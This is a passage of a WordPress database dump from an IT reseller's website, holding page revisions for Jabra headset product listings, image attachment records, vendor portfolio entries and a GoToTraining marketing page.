Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-10-03 15:30:29','2019-10-03 07:30:29','',1532,'https://bintara.com.my/blog/2019/10/03/1532-revision-v1/',0,'revision','',0),(2881,1,'2019-02-11 15:46:32','2019-02-11 07:46:32','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 20 SE</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"263\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png 263w, https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png 550w\" sizes=\"(max-width: 263px) 100vw, 263px\" />											\n		<h4>Jabra Engage 50</h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p>[maxbutton id=\"14\" ]</p><h2>Jabra Biz Wired Series</h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h3>Jabra Biz 2400 II</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png 1354w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-150x150.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1-768x768.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra BIZ 2400 II Mono 3-in-1</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p><h3>Jabra Biz 2400 II DUO</h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png 1354w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		https://youtu.be/85RJqPjfjng		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra Biz 2300</h3><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p>[maxbutton id=\"14\" ]</p><h3>JABRA BIZ 2300 QD</h3><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png 350w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png 350w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>JABRA BIZ 2300 QD DUO</h3><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p>[maxbutton id=\"14\" ]</p><h3>Jabra Biz 1500</h3><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p>[maxbutton id=\"14\" ]</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-768x768.png 768w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB-1024x1024.png 1024w, https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png 1400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n		<h3>Jabra Biz 1500 DUO USB</h3><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p>[maxbutton id=\"14\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-11 15:46:32','2019-02-11 07:46:32','',1532,'https://bintara.com.my/blog/2019/02/11/1532-revision-v1/',0,'revision','',0),(2873,1,'2019-02-11 11:59:12','2019-02-11 03:59:12','','Biz_2400_II','','inherit','closed','closed','','biz_2400_ii','','','2019-02-11 11:59:12','2019-02-11 03:59:12','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png',0,'attachment','image/png',0),(2874,1,'2019-02-11 12:02:54','2019-02-11 04:02:54','','Jabra_Biz2300','','inherit','closed','closed','','jabra_biz2300','','','2019-02-11 12:02:54','2019-02-11 04:02:54','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz2300.png',0,'attachment','image/png',0),(2875,1,'2019-02-11 15:18:38','2019-02-11 07:18:38','','jabra_biz_2400_ii_mono_3-in-1','','inherit','closed','closed','','jabra_biz_2400_ii_mono_3-in-1','','','2019-02-11 15:18:38','2019-02-11 07:18:38','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg',0,'attachment','image/jpeg',0),(2877,1,'2019-02-11 15:31:24','2019-02-11 07:31:24','','Jabra_Biz_2300_QD_Duo','','inherit','closed','closed','','jabra_biz_2300_qd_duo','','','2019-02-11 15:31:24','2019-02-11 07:31:24','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png',0,'attachment','image/png',0),(2876,1,'2019-02-11 15:25:41','2019-02-11 07:25:41','','Jabra_Biz_2300_QD','','inherit','closed','closed','','jabra_biz_2300_qd','','','2019-02-11 15:25:41','2019-02-11 07:25:41','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png',0,'attachment','image/png',0),(2878,1,'2019-02-11 15:40:23','2019-02-11 07:40:23','','Jabra_Biz_1500_DUO_USB','','inherit','closed','closed','','jabra_biz_1500_duo_usb','','','2019-02-11 15:40:23','2019-02-11 07:40:23','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png',0,'attachment','image/png',0),(2879,1,'2019-02-11 15:42:24','2019-02-11 07:42:24','','Jabra_Biz_1500_DUO_QD','','inherit','closed','closed','','jabra_biz_1500_duo_qd','','','2019-02-11 15:42:24','2019-02-11 07:42:24','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png',0,'attachment','image/png',0),(2880,1,'2019-02-11 15:42:42','2019-02-11 07:42:42','','Jabra_Biz_1500_DUO_QD','','inherit','closed','closed','','jabra_biz_1500_duo_qd-2','','','2019-02-11 15:42:42','2019-02-11 07:42:42','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD-1.png',0,'attachment','image/png',0),(1344,1,'2018-12-11 12:15:42','2018-12-11 04:15:42','3D Design, Engineering &amp; Entertainment Software. <a href=\"http://bintara.com.my/autodesk\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1669\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Autodesk.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','AUTODESK','','publish','closed','closed','','autodesk','','','2019-01-02 16:34:52','2019-01-02 08:34:52','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1344',0,'portfolio','',0),(1345,1,'2018-12-11 12:16:17','2018-12-11 04:16:17','Security, Application Delivery and Data Protection Solutions. <a href=\"https://bintara.com.my/barracuda/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1670\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Barracuda-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','BARRACUDA','','publish','closed','closed','','barracuda','','','2019-01-02 16:35:50','2019-01-02 08:35:50','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1345',0,'portfolio','',0),(1346,1,'2018-12-11 12:16:49','2018-12-11 04:16:49','Careers with BINTARA','CAREERS','','inherit','closed','closed','','1279-autosave-v1','','','2018-12-11 12:16:49','2018-12-11 04:16:49','',1279,'https://bintara.com.my/blog/2018/12/11/1279-autosave-v1/',0,'revision','',0),(1347,1,'2018-12-11 12:16:52','2018-12-11 04:16:52','Careers with BINTARA','CAREERS','','inherit','closed','closed','','1279-revision-v1','','','2018-12-11 12:16:52','2018-12-11 04:16:52','',1279,'https://bintara.com.my/blog/2018/12/11/1279-revision-v1/',0,'revision','',0),(1635,1,'2018-12-11 16:06:27','2018-12-11 08:06:27','<a href=\"https://bintara.com.my/gotowebinar/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1680\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-191x.png\" alt=\"\" width=\"1024\" height=\"681\" />','GOTOWEBINAR','','publish','closed','closed','','gotowebinar','','','2019-09-23 16:45:24','2019-09-23 08:45:24','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1635',0,'portfolio','',0),(1348,1,'2018-12-11 12:17:14','2018-12-11 04:17:14','<a href=\"http://bintara.com.my/belkin\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1770\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Belkin-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','BELKIN','','publish','closed','closed','','belkin','','','2019-01-02 16:36:02','2019-01-02 08:36:02','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1348',0,'portfolio','',0),(1349,1,'2018-12-11 12:17:36','2018-12-11 04:17:36','Interactive Flat Panels (IFP), Monitors and Projectors.\r\n\r\n<a href=\"https://bintara.com.my/benq-rp704k-4k-uhd-70/\">RP704K 4K UHD 70â€™â€™</a>\r\n\r\n<a href=\"http://bintara.com.my/benq\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1817\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-51x.png\" alt=\"\" width=\"1024\" height=\"681\" />','BENQ','','publish','closed','closed','','benq','','','2019-09-23 16:23:04','2019-09-23 08:23:04','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1349',0,'portfolio','',0),(1634,1,'2018-12-11 16:07:28','2018-12-11 08:07:28','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Custom Registration</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>RevStream Payment Processing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Content Sharing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Test and Polls</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Student Engagement</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Whiteboard Sharing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Reporting</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Certificates of Completion</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Send emails after your class and reward your attendees when they finish.</div>\r\n<ul>\r\n 	<li>\r\n<h4><strong>Recording</strong></h4>\r\n</li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;','GoToTraining','','publish','closed','closed','','gototraining','','','2019-09-30 16:12:15','2019-09-30 08:12:15','',0,'https://bintara.com.my/?page_id=1634',0,'page','',0),(1352,1,'2018-12-11 12:22:51','2018-12-11 04:22:51','BINTARA provides the right IT solutions for you. Software solutions, hardware solutions, networking solutions, security solutions, data centre solutions, and more, are shared by experts, who are ready to meet your needs.','IT Solutions Provider','','publish','closed','closed','','solutions','','','2018-12-11 12:30:15','2018-12-11 04:30:15','',0,'https://bintara.com.my/?page_id=1352',0,'page','',0),(1353,1,'2018-12-11 12:22:54','2018-12-11 04:22:54','Endpoint Security &amp; Cyber Threats. <a href=\"http://bintara.com.my/bitdefender\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1671\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Bitdefender-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','BITDEFENDER','','publish','closed','closed','','bitdefender','','','2019-01-02 16:36:09','2019-01-02 08:36:09','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1353',0,'portfolio','',0),(1354,1,'2018-12-11 12:22:03','2018-12-11 04:22:03','','b525-pdp-2017-refresh','','inherit','closed','closed','','b525-pdp-2017-refresh','','','2018-12-11 12:22:03','2018-12-11 04:22:03','',16,'https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png',0,'attachment','image/png',0),(1355,1,'2018-12-11 12:22:51','2018-12-11 04:22:51','BINTARA provides the right IT solutions for you. Software solutions, hardware solutions, networking solutions, security solutions, data centre solutions, and more, are shared by experts, who are ready to meet your needs.','Solutions','','inherit','closed','closed','','1352-revision-v1','','','2018-12-11 12:22:51','2018-12-11 04:22:51','',1352,'https://bintara.com.my/blog/2018/12/11/1352-revision-v1/',0,'revision','',0),(1356,1,'2018-12-11 12:24:10','2018-12-11 04:24:10','We can manage any part, or your entire infrastructure. Take advantage of our wide portfolio of services. Our vendor-accredited experts cover break-fix support through to enterprise-class cloud computing solutions.','IT Services','','publish','closed','closed','','services','','','2019-09-24 12:13:27','2019-09-24 04:13:27','',0,'https://bintara.com.my/?page_id=1356',0,'page','',0),(1357,1,'2018-12-11 12:24:04','2018-12-11 04:24:04','<a href=\"http://bintara.com.my/cambium\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1818\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cambium-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','CAMBIUM','','publish','closed','closed','','cambium','','','2019-01-02 16:36:49','2019-01-02 08:36:49','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1357',0,'portfolio','',0),(1633,1,'2018-12-11 16:07:02','2018-12-11 08:07:02','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their 